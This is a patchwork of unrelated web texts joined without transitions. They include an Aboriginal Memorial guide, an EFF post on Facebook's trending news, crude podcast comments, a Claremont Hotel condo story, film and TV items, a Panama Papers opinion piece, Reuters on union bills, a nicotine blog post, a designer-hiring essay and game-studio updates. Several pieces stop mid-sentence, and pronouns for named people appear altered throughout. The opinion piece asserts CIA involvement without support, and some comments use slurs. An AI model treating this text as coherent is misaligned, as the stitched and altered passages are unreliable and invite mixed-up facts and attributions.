Asked what they would prefer for the future of Route 23, they say,“Whatever's faster."
Introduction | History | Artists & Clans | Arnhem land
The Aboriginal Memorial is an installation of 200 hollow log coffins from Central Arnhem Land. It commemorates all the indigenous people who, since 1788, have lost their lives defending their land. The artists who created this installation intended that it be located in a public place where it could be preserved for future generations.
The path through the Memorial imitates the course of the Glyde River estuary which flows throughthe Arafura Swamp to the sea. The hollow log coffins are situated broadly according to where the artists' clans live along the river and its tributaries.
The different painting styles apparent in groupings are related to the artists' social groups (sometimes described as clans) which link people by or to a common ancestor, land, language and strict social affiliations.
The people of Central and Eastern Arnhem Land refer to themselves collectively as Yolngu, meaning human beings. All clans belong to a moiety i.e. one of two complementary halves of society: Dhuwa and Yirritja. All such affiliations play a part in Aboriginal artists' inherited right to paint an established set of designs belonging to their social group; this inheritance is, in fact, the artist's copyright over imagery.
The Glyde River, Central Arnhem Land
In Arnhem Land, the right to paint is usually inherited patrilineally. although many artists paint their mother's story too. The designs on the hollow logs in the Memorial are the same themes that these artists paint on bark and on people's bodies in ceremony.
Hollow logs made for a burial ceremony are large. Smaller hollow logs may be made to keep the bones of the deceased at the home of the family for a period of time. The hollow logs can also represent the deceased person  the designs on the log are the same as the designs painted on the body during the burial rites. Many of the hollow logs have a small aperture either carved or painted towards the top. Yolngu believe that this provides the soul of the deceased with a viewing hole to look through and survey the land.
Yolngu believe that to achieve a shimmering brilliance in painting through cross-hatching and line work  giving a 'singing' quality to the imagery  is to evoke ancestral power. Artists from nine groups worked on the Memorial, and, whilst clan designs follow strict conventions ruling subject matter, each individual artist's hand is apparent.
As you move through the Memorial, you will witness the imagery from changing environments, from the lands of the saltwater people further inland to the country of the freshwater people.
Artist Bobby Bunnunngurr's son in ceremonial dress and with their body painted at their initiation ceremony
The natural environment and its phenomena are vital to the Yolngu's clan identity. 'We Yolngu belong to different barpurru [clan groups] and each barpurru paints things differently; it depends on if you come from the gulunbuy [mangroves] or diltjipuy [forests] or rangipuy [beach] ... It's important to know the difference and we need to teach the young people to paint in this way because they don't know. I teach them by painting a picture so they learn to see the difference,' says George Malibirr.
The work is unified by an array of common themes: the celebration of life, respect for the dead and mortuary traditions and people's connection with ancestral beings. Themes of transition and regeneration within Aboriginal culture pervade the Memorial. On a wider scale, the Memorial also marks a watershed in the history of Australian society. Whilst it is intended as a war memorial, it is also a historical statement, a testimony to the resilience of indigenous people and culture in the face of great odds, and a legacy for future generations of Australians.
UPDATE: Facebook's general counsel posted a response to Sen. Thune's letter on May 23, 2016.
Allegations that Facebook's “trending” news stories are not actually those that are most popular among users drew the attention of Sen. John Thune (R-SD), who sent a letter of inquiry to Facebook suggesting that the company may be “misleading” the public, and demanding to know details about how the company decides what content to display in the trending news feed. Sen. Thune appears particularly disturbed by charges that the company routinely excludes news stories of interest to conservative readers.
Congressional inquiries usually come with the tacit understanding that Congress investigates when it thinks it could also legislate. Yet any legislative action in response to the revelations would run afoul of the First Amendment. It is possible that Sen. Thune, as chairperson of the Senate Commerce Committee, sees Facebook as engaging is “unfair or deceptive” trade practices, but that still does not create a legal basis for regulating what amounts to Facebook's editorial decision-making.
First Amendment Protects Facebook's Editorial Decisions
In Miami Herald Publishing Co. v. Tornillo (1974), the Supreme Court held that under the First Amendment, the government may not tell a private publisher what to print or not to print, nor may the government punish a publisher for making editorial decisions. The Court stated:
The choice of material to go into a newspaper, and the decisions made as to limitations on the size and content of the paper, and treatment of public issues and public officials—whether fair or unfair—constitute the exercise of editorial control and judgment.
Although that case involved a newspaper, the constitutional rule is just as applicable to the Internet, where a wide range of websites—from newspapers' digital homes to social media platforms native to the online space—have the right to be free from government interference with their publishing practices.
Even if Congress never takes any action, Sen. Thune's letter alone—questioning Facebook's editorial decisions—is an improper intrusion into editorial freedom. Moreover, such an official government inquiry into constitutionally protected activity can create a “chilling effect” that dissuades individuals, even companies, from acting in wholly legal ways.
Sen. Thune's letter is a close cousin to the tactic deployed by the sheriff of Cook County, Illinois, who wrote letters on official letterhead urging credit card companies to stop providing payment processing services to classifieds websites like Backpage.com, while suggesting that the companies might be legally culpable if they refused to heed the sheriff's request. Backpage challenged the sheriff's actions and the Seventh Circuit Court of Appeals held that the sheriff violated the website's First Amendment rights.
As a Republican, Sen. Thune seems offended that Facebook might be purposefully excluding conservative news stories. But conservatives were outraged when the FCC proposed conducting a newsroom survey in 2014. Republican lawmakers and conservative commentators complained that the Obama administration was maneuvering to control media content in violation of the First Amendment. And Sen. Thune himself, in 2007, criticized those in Washington, DC, who, they said, were “reviving an old idea that the government can, and should, regulate the reporting of news, information and ideas.”
Facebook Should Be Fair and Transparent About Its Content Policies
There is a distinction that we want to emphasize: Facebook as a curator of news stories—exercising editorial judgment just like any other media outlet—and Facebook as a social media platform and host of user-generated content.
As a legal matter, in both roles, Facebook is protected by the First Amendment and thus has a right to publish content online free from government interference. As a policy matter, however, it would behoove the company to be more transparent about its content policies.
While it is understandable that Facebook users might want more transparency about what goes into producing the “trending” news feed (including whether the company is exercising political bias), we are more concerned about how Facebook acts in its more prominent role as a host of user-generated content.
As a social media platform, Facebook solicits and displays often highly personal text and images that individuals post to express themselves and connect with their loved ones and communities. People around the world have come to significantly rely on Facebook, even in life-and-death situations.
Yet the company reorders, emphasizes and minimizes posts to everyone's news feed. And it enforces its terms of service in a selective manner: deleting some posts, censoring some images, and throwing some users off its service, while letting other apparent offenders go unpunished. We have criticized Facebook for unclear content policies and arbitrary enforcement of its terms of service.
At onlinecensorship.org, EFF is tracking such behavior by private social media companies. Whether a company justifies its actions by referencing its terms of service or some other reason, we want to better understand patterns in social media censorship. We encourage individuals who have had their own content removed or their account suspended to report their experiences there.
Facebook has a right to make its own decisions about what it does or does not say online. But it when it comes to providing a service that enables others to speak as well, Facebook should be fair and transparent about how it handles other people's content—and the company should always expect to have its decisions explored and debated by its users and the wider public.
Comment on ABR Podcast: 049 – Atheistically Ranting by John Brockman Wait... someone actually defended Ellen's tweet with "What about black-on-black piggyback rides?" John Brockman
Comment on ABR Podcast: 049 – Atheistically Ranting by makroth Systematically Idealizing Mediocre Pussy. It sounds like another version of ''mangina'' to me. makroth
Comment on ABR Podcast: 051 – America, FUCK YEAH! by Dock McDowell III Hey Ishmael, I am a 40 year old black male that is caught somewhere in the religious spectrum between agnostic and atheist. (Can't eliminate all of the programming but redirecting it works sometimes.) just want you to know I love the show. I can't afford to support at this time but want you to know […] Dock McDowell III
Comment on ABR Podcast: 050 – Vegeta Wins! by Aneta OMG! You for Alix again!? Yes! It's so great to hear them speak so much more. He's the smartest on on Dogma Debate and Smalley just won't shut up. Aneta
Comment on ABR Podcast: 048 – Hill Street Blues by Ishmael Brown Oh I know it was. We figured it out before we left the topic. Ishmael Brown
Comment on ABR Podcast: 048 – Hill Street Blues by Johncrow Batty P Butta joke about Marcus Garvey wasn't as weird as you thought. Garvey frequently called for black people to return back to Africa. They also set up the Black Star Line company which bought a fleet of ships with aim of helping africans in the diaspora to return home. Johncrow Batty
Comment on ABR Podcast: 044 – The Big Feedback by Cortez Mack If you require and expect police officers to report crime and internal rule violations by other officers, that is not asking them to become "activists". That is asking them to DO THEIR JOBS as police officers. Their ENTIRE JOB is to enforce the law and protect the citizens under the law's jurisdiction. If they cannot […] Cortez Mack
Comment on ABR Podcast: 043 – P Butta Returns by makroth Bee-El-Zuh-Bub! That really bugged. I'm not from America, so i can't vote. But i that people should vote for Hillary and hold their feet to the fire. They're not so much voting for them as they are voting for the Democratic Party. Voting+activism is the best strategy. Being better than Trump is really not an […] makroth
Comment on ABR Podcast: 045 – The Prophet Returns (Creative right?) by Heinzmonkey Wow, Robert Price really is a fuckboy ! Jesus, I guess they're right when they say don't meet your heroes... Heinzmonkey
The Claremont Club & Spa, a gleaming chateau that's one of the most visible landmarks in the East Bay hills, is about to get a makeover — and potentially 45 new condos.
Developer Michael Ghielmetti is negotiating with the city of Oakland to build several stories of housing on what's currently a terraced parking lot outside the hotel lobby, creating what they say will be a perfect residential community for empty nesters.
“It's an opportunity for new housing, which is desperately needed in the Bay Area,” Ghielmetti said. They and the Claremont's general manager, Leonard Czarnecki, have pitched the project as an optimal use of land that's now taken up by parking spaces and a wide, sloped driveway.
That proposal found favor with Rachel Flynn, head of planning and building for the city of Oakland. “It's a great idea to create density near existing neighborhoods,” Flynn said. They added that it makes sense for Ghielmetti to market the condos to aging Baby Boomers, who, along with Millennial tech workers, are the largest drivers of the Bay Area real estate market.
Yet the project has prompted concern from preservationists and residents of the surrounding neighborhood. Despite Ghielmetti's promise to complement the existing hotel architecture, and not build beyond Alvarado Road — the east boundary of the 22-acre property — some neighbors still fear that a stack of new condos will blemish an iconic site.
“From our point of view, there's good development, and there's bad development,” said Roger Feuer, general manager of Rick & Ann's Restaurant, a popular brunch spot across the street from the hotel.
“If we hardly notice it, that's good,” they said. “But if it's a big pimple on the Claremont, that's bad.”
Over the past few months, staff from Ghielmetti's firm, Signature Development Group, have met with members of the community to discuss concerns and visions for the project. Although Ghielmetti said the meetings have been overwhelmingly positive, they also cautioned that the idea is still in its early stages. Signature still has to conduct traffic studies, create enough parking to accommodate newcomers and guests, and convince longtime residents that a new condo development won't crowd the neighborhood.
“They've asked us to study traffic, and that's something we'll look at in depth in our environmental studies,” they said, insisting that 45 new homes shouldn't have a significant impact on congestion.
Fears of traffic jams
But Miriam Wilson, a Realtor who lives on the Uplands — a street wedged between Claremont Avenue and Highway 13 — said they worry that a new condo development will create huge jams outside their home.
“It's not that we're opposed to growth; it's that our street is already a gateway into the hotel and onto the freeway,” said Wilson, 69, who has already attended three planning meetings to discuss the project.
“This is not going to add to anyone's benefit except the Claremont,” they added.
The next planning meeting is set for Thursday at 7 p.m. in the Claremont Hotel Ballroom.
Once the environmental studies are complete and the project is approved by Oakland officials, it could break ground as early as 2018.
Built more than a century ago, the Claremont was an homage to the Tudor architecture of 16th century England: a sprawling castle on a hill with jutting dormers and a bell tower.
“The story I've always heard is that it was painted with dark timbers and light-colored stucco to look Elizabethan,” said Anthony Bruce, head of the Berkeley Architectural Heritage Association. “But then for the 1939 World's Fair on Treasure Island they wanted it to be very visible, so they painted it a brilliant white.”
Idea of housing not new
To this day, it's the most opulent resort in the region, with 276 guest rooms and an adjacent club that includes three swimming pools, 10 tennis courts and a “mind-body studio.”
The idea to add housing began gestating years ago, and it's long been a subject of controversy, said Bruce, who grew up nearby.
In 1959, they said, “they sent postcards to everyone in the neighborhood about a new high-rise,” they said. “Everyone was shocked.”
Naomi Schiff of the Oakland Heritage Alliance said the Claremont was the focus of spirited debate in the 1980s, when local historians were fighting to preserve it as a landmark. Though it eventually got landmark status in 2002, the designation extended only to the edge of the building, not the entire grounds.
“We were not happy about that,” they said.
The Oakland Heritage Alliance has yet to weigh in on the condo proposal, but Schiff said its members have concerns about whether it will interfere with the character of the hotel.
Two years ago, the Claremont was purchased by the Fairmont hotel group and Richard Blum, the powerful financier who is the husband of Sen. Dianne Feinstein, D-Calif. The new owners took on an ambitious restoration project — remodeling the guest rooms, repairing the elevators, redesigning the lobby and adding a new restaurant. They also revived the housing idea, hiring Signature to do preliminary studies.
Over the past few months, Signature has produced conceptual designs for what Ghielmetti hopes will be a comprehensive upgrade. The parking will move underground, the entryway will be spruced up, and the blacktop driveway will become a chic residential enclave. Ghielmetti hired San Francisco architecture firm Levy Design Partners to create the condo blueprint.
Designed for downsizers
To Czarnecki, it's a “perfect marriage.” The market-rate condos will provide ideal housing for hills residents looking to downsize. Living next to the Claremont would give them all the amenities of a big house, they said. Plus they'd be walking distance from the shops and restaurants on Domingo Avenue.
“If empty nesters move into those condos, it'll free up homes for new families to move in,” Ghielmetti said.
At least one person who happened to be walking along Domingo Avenue on Friday said they liked the sales pitch.
“Our house is too big, it has too many steps, and having more alternatives is a good idea,” said Stuart Lichter, a 70-year-old retired community college teacher who lives in the area.
“We would consider moving in,” they added.
Rachel Swan is a San Francisco Chronicle staff writer. Email: rswan@sfchronicle.com
Twitter: @rachelswan
The project reunites Johnson, New Line and producer Beau Flynn, who teamed for the hit disaster pic 'San Andreas.'
New Line is bringing a live-action adaptation of popular '80s video game Rampage to the big screen with Dwayne Johnson attached to star.
The project reunites Johnson, New Line and producer Beau Flynn, who teamed for the hit disaster pic San Andreas.
Given the success of San Andreas and its more than $400 million worldwide box-office haul, New Line is eager to get Rampage off the ground and is eyeing a 2016 summer production start.
Based on the Midway Arcade Game, the script is being written by Ryan Engle (Non-Stop). There's no director attached at this point.
Johnson is having one of the highest-profile summers of any actor. In addition to San Andreas, they starred in the mammoth hit Furious Seven. And their heavily promoted series Ballers premiered on HBO on June 21.
 They are repped by WME, Garcia Companies and Gang Tyre. Engle is handled by Original Artists and Mosaic.
611 Shares 0
611
0
0
Fittingly, in the same week that astronomers discovered a huge new super black hole in a distant part of the galaxy, here on Earth the public got a glimpse of the gargantuan amount of money that the global elite suck into tax havens.
The so-called Panama Papers of leaked data on tax dodging by the global one percent may have been used initially as a political smear-job against Russian President Vladimir Putin. There is good evidence of CIA links to the release by the Washington DC-based International Consortium of Investigative Journalists. That smear-job failed the credibility test, with Putin's name not even among the thousands of clients belonging to the Panamanian law firm specializing in setting up shell companies in tax havens.
Like a boomerang, the dirty trick against Putin then rebounded on British Prime Minister David Cameron and many other world leaders –several of who are close allies to Washington –who were actually implicated in the tax-dodging schemes set up by law firm Mossack Fonseca, based in Panama. The Icelandic premier was forced out of office and there are calls for Cameron to similarly quit.
It is appropriate that corrupt politicians and other public officials be held to account if they are caught gaming fiduciary finances.
But in all the scandalous ferment what we should bring to the fore is the enormous scale of tax dodging by the global elite, and how that wealth is sucked out of our societies, resulting in austerity and poverty for the majority.
London-based campaign group, the Tax Justice Network, estimates that worldwide there is a total of $21-$32 trillion deposited in shell companies that have been set up in the Caribbean offshore tax havens like the British Virgin Islands, Bermuda and Cayman Islands.
Within the United States, tax havens are operated legally in certain states like Delaware, Nevada and Wyoming, where corporations like Apple and Coca-Cola can set up front companies to avail of zero taxation by the federal government. One reason why US clients have not appeared to feature much in the leaked Panama Papers is because they don't need exotic Caribbean tax shelters owing to the availability within the US.
Let's take the upper estimate of $32 trillion in worldwide hidden tax wealth. That's almost double the size of the entire US economy. Or nearly half the total world annual economic output, according to World Bank data.
Now, people like Britain's David Cameron and the law firm Mossack Fonseca will say they have done nothing illegal. And yes that is partially correct. But avoiding tax payment is only legal because our governments have written the rules that way.
The point is that we should write laws that make the use of tax shelters illegal. Why should ordinary working people have to pay taxes when the one percent are allowed to pay nothing?
Out of the total $32 trillion in tax havens worldwide, it is estimated that that amounts to $190-$280 billion in lost revenues to government treasuries.
Let's put that figure in perspective. The UN Food and Agriculture Organization reckons that an annual spend of some $44 billion would be enough to wipe out world hunger. That's less than 16 per cent of the revenues lost in the planet's firmament of tax-dodging sites.
That still leaves a lot of money that could be used to eradicate diseases, build good public services in health and education and other social development –worldwide.
The use of tax shelters by the global elite has gained increasing prominence over the past three decades as governments increasingly pander to a wealthy minority. This is in line with the burden of taxation shifting more and more on to ordinary workers and their families. The shift is also correlated to the exploding gap between a super rich elite and the rest of us.
The figures are well known by now. In the US the top one percent own more wealth than the bottom 90 percent. A few dozen billionaires own more wealth than half the American population. Worldwide, the aid agency Oxfam estimates that 62 multi-billionaires own more wealth than half the world's entire population –some 3.5 billion people.
This grotesque and relentless polarization of wealth both within countries and internationally is unsustainable. It is killing our societies, destroying communities, spawning unemployment, poverty, ill health and crumby schools. And yet the status quo of governments especially in Western countries tell us that there is no money in the public coffers and hence we must endure economic austerity and cutbacks to pay off fiscal deficits.
The polarization of wealth and the concomitant degeneration of societies is what happens under capitalism. Politicians and media get bought off and fix the rules of the game leading to further distortion and degeneration. And the tax havens that operate worldwide with governments'tacit consent are an instrument for this unsustainable capitalism.
The wealth that rich people and corporations have shunted from out societies is more than enough to fix our broken societies and literally make another world possible.
But, for that, we the people need to elect politicians and governments that actually represent us. All that is missing is the political will to bring rapacious banks, corporations and their one percent under control. A reasonable start would be shutting down tax havens and getting the rich to pay their long overdue fair share.
Tax havens are not in outer space like black holes, operating above the laws of physics. They are within reach of democratic laws. We just have to make those laws through democratic governments that actually work for us.
March 10 (Reuters) - Wisconsin's state Assembly on Thursday approved restrictions on collective bargaining rights of state and local government unions, which have become a test of the national political and economic clout of the U.S. labor movement. [ID:nN10158741]
Public employee unions have the right to collectively bargain in about 30 states, plus the District of Columbia and Puerto Rico.
In some states in the South and West, public employees do not have the right to collectively bargain, and in Virginia and Texas it is illegal to enter into a formal bargaining relationship with the public sector.
Here are nine states where curbs on union power are under consideration.
* WISCONSIN: After a bitter three-week battle that saw Senate Democrats flee the state to prevent a quorum and block a vote, Wisconsin's Republican Governor Scott Walker won a key part of their proposal to curb union rights. Republicans split off the legislation's spending provisions and voted only on the union bargaining limits — a strategy that did not require Democrats show up to create a quorum. The bill was approved by the Republican-controlled State Assembly.
The new legislation includes the most controversial sections of the union proposal, which limits public sector union bargaining to wages, and only up to the rate of inflation. The state would no longer collect union dues from paychecks, and members must vote each year to stay in the union. It requires public workers to pay more for health insurance and pension plans. Local police, fire and state patrol would be exempted from the changes.
* OHIO: Ohio's bill goes farther than Wisconsin's, prohibiting collective bargaining for 42,000 state workers plus 19,500 college system workers. For local governments, bargaining with unions representing some 300,000 workers including police, firefighters, and public school teachers, the bill takes healthcare and some other benefits out of the negotiating process. It denies them the right to strike.
The bill passed the Senate March 1. The Ohio House of Representatives will hold at least one more week of hearings on the bill, according to the spokesperson for Republican speaker William G. Batchelder. A date for a vote has not been set. Ohio Republican Governor John Kasich has said they support the measure.
* IDAHO: The Idaho state legislature has approved a bill to limit collective bargaining by public school teachers. The measure restricts collective bargaining to salaries and benefits, removing from negotiations such provisions as class sizes, teacher workload and promotions. Republican Governor Bruce Otter was expected to sign it into law quickly.
* IOWA: The state House of Representatives is debating a bill curbing collective bargaining rights for public workers that was passed by the labor committee. The bill would exclude health insurance from the scope of collective bargaining, along with other changes. Democrats who control the Senate said they do not intend to bring the bill up for debate.
* MICHIGAN: Both chambers of the Michigan legislature have approved measures to give the state emergency powers to break union contracts to revive failing schools and cities. There are slight differences between the bills passed by the two chambers which must be reconciled. New Republican Governor Rick Snyder has said they support the measure.
* INDIANA: Republican state lawmakers are pushing several measures that curb organized labor influence. The state Senate passed a bill that will narrow the scope of public school teachers' collective bargaining rights. The measure still needs to be approved by the state House, but House Democrats have left the state to deny votes on bills they say restrict workers' rights. One bill would create a state-wide school voucher system.
* NEW HAMPSHIRE: A right-to-work bill that refers only to public sector workers prohibits collective bargaining agreements that require employees to join labor unions. It also says that no public employee union is required to represent employees who elect not to join or pay dues. It passed the House and next goes to the Senate. Both legislative bodies have Republican majorities, but Governor John Lynch, a Democrat, has said they do not support the bill.
* KANSAS: The Kansas House has passed a bill that would outlaw employee payroll deductions for union dues and political action committees.
* TENNESSEE: A Republican-backed state bill would end teachers' rights to negotiate their working conditions with boards of education through collective bargaining. The bill has passed through the Senate Education Committee.
* OTHER STATES: Limits on public worker collective bargaining have been introduced in several other states as of last week, according to the National Conference of State Legislatures. These include Colorado, Nebraska, Nevada, Oklahoma, New Hampshire, New Mexico, Washington, Alaska and Arizona.
American Spirit Number One for Freebasing
by tobaccofreeweld
While nicotine is what gets people addicted and gives them the buzz to keep using, it is not easily extracted from the plant form of tobacco. In order for it to release chemically, ammonia and other freebasing items are added to the products. American Spirit has often claimed to have no additives or preservatives, but recent research has shown it to have the highest level of free basing ability which indicates higher levels of ammonia. Maybe it's just made from natural sources…like urine.
Adding ammonia to cigarettes increases the amount of easily absorbed “freebase” nicotine released by smoking, which may make some cigarettes more addictive than others depending on their formulas, the Independent reported July 28.
Researchers at the Oregon Health and Science University looked at 11 U.S. cigarette brands and found that some had up to 20 times more freebase nicotine — a form of the drug that is quickly absorbed and transmitted to the brain and central nervous system. Cigarettes with high levels of freebase nicotine probably are more addictive, researchers said.
American Spirit cigarettes, for example, had 36 percent freebase nicotine, compared to 1 percent in a benchmark cigarette, 2.7 percent in Camel, 5-6.2 percent in Winston, and 9.6 percent in Marlboro.
“During smoking, only the freebase form can [evaporate] from a particle into the air in the respiratory tract,” said study leader James Pankow. “Gaseous nicotine is known to deposit super-quickly in the lungs. From there, it's transported rapidly to the brain. Since scientists have shown that a drug becomes more addictive when it is delivered to the brain more rapidly, freebase nicotine levels in cigarette smoke are thus at the heart of the controversy regarding the tobacco industry's use of additives such as ammonia and urea.”
The study was published in the January 2003 issue of the journal Chemical Research in Toxicology.
Pankow, J., Barsanti, K., & Peyton, D. (2003) Fraction of Free-Base Nicotine in Fresh Smoke Particulate Matter from the Eclipse “Cigarette” by 1H NMR Spectroscopy. Chemical Research in Toxicology, 16(1): 23-27.
Advertisements
Hiring a designer: hunting the unicorn
Braden Kowitz Blocked Unblock Follow Nov 1, 2011
Finding the perfect designer to join your team is tough — there's no way around it. I've struggled for months searching for the right designer. And if you're an engineer or MBA without a background in design, hiring a designer can be daunting, frustrating, or even downright scary.
So one of the topics we're planning to cover at GV is how to hire great designers. We can talk about how to review portfolios, how to interview candidates, and how to persuade a designer that your team is worth joining. But before all that, there's a fundamental question you need to answer: What kind of designer are you looking for?
The field of UX design is still young. And because it has grown so fast, practitioners have largely immigrated from neighboring fields. A given designer's background might be rooted in ethnography, journalism, art, cognitive psychology, engineering, or other disciplines. You might find one designer who can illustrate with ease, while another can barely manage a stick figure, but both are competent UX designers. The same dramatic differences can be found in any number of other skill areas. The group of people who call themselves a “designer” is remarkably diverse.
That's why I don't find the term “designer” to be useful in describing the skills a candidate should have. When people ask, “I need to hire a designer, do you know any?” I fire back, “What kind of designer?” Because knowing what kind of designer requires breaking down the role into more granular skills that are easier to describe in a job listing and easier to evaluate during an interview.
What skills do you need?
The first step to hiring a designer is to list out all the skills necessary to build your product. Here's my short list of the most critical product skills, and the questions that those skills help answer.
Research — What do customers want? Can they figure out how to use our product?
Product design — What are we building? What are we not building? What's in this release?
Copywriting — How do we describe our product to customers in a way they understand?
Interaction design — How does the product behave? How is it organized?
Visual design — How does the product look and feel?
UI development — How do we build quality interfaces quickly and flexibly?
There are many other skills you might need: facilitation, content strategy, storytelling, game design, editing, iteration management, etc. You can find a longer list in Jared Spool's excellent article on assessing your team's UX skills.
If you're hiring a designer, start with a skill list. From there, it'll be easier to see what skills are already covered on your team. And it'll be possible to prioritize skills based on the product you're building. Some of these skills might be more or less important. For example, if you're building an internal tool for IT departments, you probably need product design more than visual design. With this narrowed-down list, we now know what type of designer we're looking to hire.
Hunting the unicorn
Have you ever read a designer job listing that sounds like this?
Seed-stage startup looking for rockstar junior designer to sketch wireframes and design beautiful mockups. You'll be responsible for crafting our logo and brand and writing UI copy. Must know how to run usability studies, prototype and write production-ready HTML and CSS.
When I read a post like this I think, “Great! There's a team that understands all the skills they'll need!” But I also think, “They're looking for a unicorn — a magical designer who can solve all their problems.” It's too bad unicorns don't exist.
There's nothing wrong with being aspirational, but job listings like this don't work for a few reasons:
I have never met a designer who is an expert in all those skill areas. Listing a bevy of skills can discourage people from applying, even though they are good fit for your team.
Designers that respond to that job listing will differ greatly in their skill coverage. In order to decide between them, you'll still need to prioritize what skills you need. It's better to do that first, rather than after the interview.
Even if you find a unicorn designer with all those skills, actually doing all those things at your company is a huge amount of work. One full-time person probably isn't going to cut it.
The best designers, the ones who are experienced, will read a job listing like this and be able to tell that the author is asking too much from a single person. It's a signal that the author is not familiar with user-centered design, and it can scare away good designers.
Tough choices
When I prepare to hire a design team, I decide which few skills are critical and should be covered in-house. The rest of the skills can either be covered by part-time help or can be done without. There are difficult trade-offs to be made. Here are some of the toughest:
Should we hire a designer who can code?
I believe it's important for any designer to understand their medium, and that means that software designers should understand the basics of software development. (I have an engineering background and it has served me well.)
But usually I think it's a bad idea to ask your designer to write production code. First, since many designers can't code, you're limiting the pool of candidates. Second, startup teams are typically engineering heavy. The rest of the team is often better at front-end development than any designer. In terms of skill coverage, when you hire a designer that can code, you're doubling down on engineering, when you could be diversifying and getting other skills on your team. But most important, design is a full-time job. If you're asking your designer to write code, you're asking them to spend less time designing, studying users, prototyping, and doing all of the other activities that lead to great products.
For very small teams (3 engineers or fewer), I think it can work to have someone both designing and writing code. But it's often better to have a full-time designer paired with a front-end developer who cares about design. This way each person focuses on their core strength, and they share a common language in design that'll make working together easier. Don't find a designer who can code — find an engineer who loves design.
Do we really need a user researcher?
A good user researcher can be your eyes and ears. They can help you understand what your customers really want, and why they might not need your product. They can measure whether your customers even understand how to use the software you've shipped. All of this data is essential in finding product-market fit. And on larger products, this data gives teams the confidence they need to make changes.
A huge part of user-centered design and lean startup methodology is getting out from behind your desk, out of the office, and talking to your customers. Is there someone on your team who does this naturally, who loves talking to customers?
Everyone has their center of gravity. If I had a free hour, I'd spend it sketching. Engineers will spend their free hour coding. And every good team should have someone who's center of gravity is outside the office. This is the person that'll chime in when you're having an argument about features and say, “I'll go out, ask some customers, and we'll know by this evening.”
There are many roles that have their center of gravity outside the office: user research, sales, community management, business development, etc. And all of these people can help to gather data about customer needs in different ways. For the products I've worked on, user research has been an indispensable part of the product design process. And for anyone building consumer-facing products, I highly recommend working with a user researcher from the very beginning.
What's more important: interaction design or visual design?
Luckily, it's common to find UX designers who are good at both visual design (how it looks) and interaction design (how it works). Both skill-sets are required to build great products, and both are core to how customers understand and perceive the product.
Any design candidate you interview will be better at one than the other. (I'm much better at interaction design than visual design.) So if you only have enough space on your team to hire one designer, you'll have to decide which skill set is more important for the product you're building.
Focus on visual design if your product:
Must be more delightful than competitors (e.g. games)
Needs to appear credible, well built, and high quality (e.g. finance)
Creates a space that people aspire to be a part of (e.g. communities)
Focus on interaction design if your product:
Make Christmas Eternal!
A Snowflake, captured and preserved in an intricate hollow star cage. The snowflake hangs from 6 loose chains - makes a great unique Christmas Tree decoration using the inbuilt hoop and looks great all year round!
The material this ornament is 3D printed in is slightly flexible, this makes it incredibly strong for the purpose and size of this ornament and produces a very strong final 3D printed product, the chains within the design are also incredibly strong.
Check out the video of the 'Captured Snowflake' below!
This design can be manufactured in no other way than 3d printing as it exploits the technology's incredible ability to trap objects within objects and create moving parts within a design.
This ornament is designed by myself and 3D printed on demand for you, it is 3D printed in one go and comes out of the 3D printer already fully assembled!
Feel free to check out the rest of my shop for more cleaverly designed christmas themed products as well as other great gift ideas.
The two-hour farewell to the best damn doctor that ever lived (on TV) was a gut puncher in every way possible.
Well, not every way. If Cristina Yang had even momentarily appeared in the flesh to comfort their bestie Meredith, millions of Grey's Anatomy fans would currently be curled up in fetal position on the bathroom floor.
But the first episode following Derek Shepherd's shocking death was nonetheless sad — and quite well done.
At first, the episode seemed a little slow. Meredith delivered the news to their coworkers, collapsed, time jumped a bit to the funeral and before we knew it, Meredith Grey was taking off into the night with little more than a note to explain their absence to their loved ones.
The rest of the episode saw a number of time jumps — usually a few months at a time, and during those, we'd get small peeks at how the doctors at Grey-Sloan Memorial were coping. (Also, to really hammer home the theme of healing, we followed the long-term recoveries of two patients.)
It became quickly clear that all of them were dealing in their own ways. Amelia was using humor as a coping mechanism, April ran off to do surgery in a war zone with Owen, Bailey seemingly became even closer with Ben, Jackson grew quite the beard, and Meredith grew a baby.
Woah, baby. Image: ABC
Yes, Meredith, it turns out, was pregnant.
That reveal was just one of the many moments during the episode left us in shambles. More peak moments of emotional destruction are chronicled below.
.
A big thank you to everyone who came out for the last playtest and an even bigger thank you to all who submitted footage for the trailer.
Without further adieu, we present our Early Access Gameplay Trailer (turn up the volume!):
.
The game is looking and playing great. While there is still a ton of work to be done, we couldn't be more proud of what our team has built over the last 6 months and the potential that lies ahead. Releasing to early access will give us the resources to aim even bigger and move even faster in the coming months.
We want to make it clear that we are here because of you. Your financial support, your constructive criticism, and your thoughtful feedback and suggestions have all been invaluable to us as we make this dream a reality.
.
But, we have decided to delay Early Access to January and here's why...
.
.
.
.
.
.
.
We made Omaha because you asked for it. Doing it properly required a whole new approach from the art, technical and design points of view, but we think Omaha beach is a must-have for any WW2 video game and will be an exciting addition to the map rotation on launch day.
We will be releasing more details about Omaha in the coming weeks!
Also, check out our latest writeup on IGN
http://www.ign.com/articles/2016/12/08/ww2-shooter-days-of-war-hits-early-access-in-january
.
Steam Page Launch and Game Giveaway
The Steam Store page and community hub are now live: store.steampowered.com/app/454350
To celebrate we are going to be giving away 25 copies of the game.
To enter the giveaway, all you need to do is share Days of War Steam page on social media using this link: http://daysofwar.nouncy.com/store-launch#/ .
.
One week ago we ran our Prismata tourney hackathon, in which we attempted to develop a tournament feature for our online game Prismata in only 30 hours. Overall, it was an excellent experience for us in which we were highly productive. In this article, we're going to describe how things went, what we accomplished, and what we learned.
But first, here's the highlight reel:
[youtube=http://youtu.be/hQE39nDg4RM&w=880&h=495]
How it went down
To be clear, this hackathon wasn't some kind of last-minute crunch in the face of a looming deadline. Tourneys were merely a feature that we knew we eventually wanted, and I felt that ignoring all other distractions for a day and a half would be a good way to get a prototype into the client fast so we could get some user feedback. Yes, we promised everyone that we'd host a tournament 30 hours after we started (and we even invited some poker and Hearthstone pros!), but this was mainly just something I wanted to do to add a bit of an incentive. At least for me, fear of failure is very motivating!
Hackathon-style coding—meaning a blocked off segment of time in which developers work in intense collaboration on one single core product or feature—is something dear to our hearts. In fact, the client and server for the first web-based version of Prismata was developed during a week-long hackathon way back around the Christmas holidays at the end of 2011 and beginning of 2012.
Initially, only our founding members (me, Will Ma, and Alex Wice) were going to participate, but two of our other developers (Alexey Kozhevnikov and TC Fraser) were eager to pitch in (and no, we didn't force any overtime on them; we sent them home for the night!) We scheduled the hackathon to begin at 1pm on Wednesday and continue until 7pm on Thursday, straddling two work days so that about half of the 30 hours would occur during regular work hours.
